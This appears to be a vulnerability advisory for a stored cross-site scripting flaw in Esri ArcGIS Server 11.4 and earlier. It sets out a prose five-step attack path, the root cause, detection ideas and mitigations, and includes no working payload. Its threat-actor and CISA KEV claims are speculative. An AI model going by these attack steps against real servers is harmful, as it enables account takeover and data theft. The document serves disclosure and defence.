Source: psirt@esri.com
There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim’s browser.
Esri ArcGIS Server 11.4 and earlier is vulnerable to a stored cross-site scripting (XSS) attack, allowing unauthenticated attackers to inject malicious code into the server. This vulnerability enables attackers to compromise user browsers, potentially leading to account takeover and data exfiltration.
Step 1: Payload Creation: The attacker crafts a malicious file (e.g., an HTML file, a JavaScript file, or a file containing JavaScript code) containing a JavaScript payload designed to execute in a victim's browser. This payload could be designed to steal cookies, redirect the user, or perform other malicious actions.
Step 2: File Upload: The attacker leverages a configuration vulnerability within ArcGIS Server to upload the malicious file to a location accessible by other users. This might involve exploiting a file upload feature or a misconfigured directory.
Step 3: Payload Storage: The ArcGIS Server stores the uploaded file without proper sanitization or encoding of the JavaScript payload.
Step 4: Victim Interaction: A legitimate user accesses a web page or feature within ArcGIS Server that renders or displays the uploaded file. This could be through a map, a report, or another feature that incorporates user-uploaded content.
Step 5: Payload Execution: The victim's browser executes the malicious JavaScript code embedded within the uploaded file. The code runs within the context of the ArcGIS Server domain, allowing the attacker to perform actions on behalf of the victim.
The vulnerability stems from insufficient input validation and sanitization of user-supplied data when storing files within the ArcGIS Server environment. Specifically, the server fails to properly filter or encode potentially malicious JavaScript code embedded within uploaded files. When a victim subsequently accesses a web page that renders these stored files, the malicious script executes within the victim's browser context, enabling the attacker to perform actions on behalf of the user. The root cause is a lack of proper input validation and output encoding on the server-side, allowing for the storage of malicious payloads that are later rendered without proper sanitization. This allows for the execution of arbitrary JavaScript code within the context of the ArcGIS Server domain.
Likely targeted by various threat actors, including those seeking to compromise geospatial data and infrastructure. APT groups known for targeting government and critical infrastructure are likely to exploit this vulnerability. CISA KEV status is highly probable given the severity and ease of exploitation.
Monitor server logs for suspicious file uploads, especially those with unusual file extensions or content.
Analyze network traffic for unusual HTTP requests or responses containing JavaScript code.
Implement a Web Application Firewall (WAF) with rules to detect and block XSS attempts.
Monitor for changes to files stored on the ArcGIS Server, especially those related to web content.
Use a security information and event management (SIEM) system to correlate events and identify potential attacks.
Upgrade ArcGIS Server to version 11.5 or later, which includes a fix for this vulnerability.
Implement robust input validation and output encoding to sanitize user-supplied data before storing it.
Configure the server to restrict file upload types and sizes.
Regularly scan the server for vulnerabilities and apply security patches promptly.
Implement a Web Application Firewall (WAF) to filter malicious requests.
Review and harden the server's configuration to minimize attack surface.
Implement a content security policy (CSP) to restrict the execution of JavaScript code.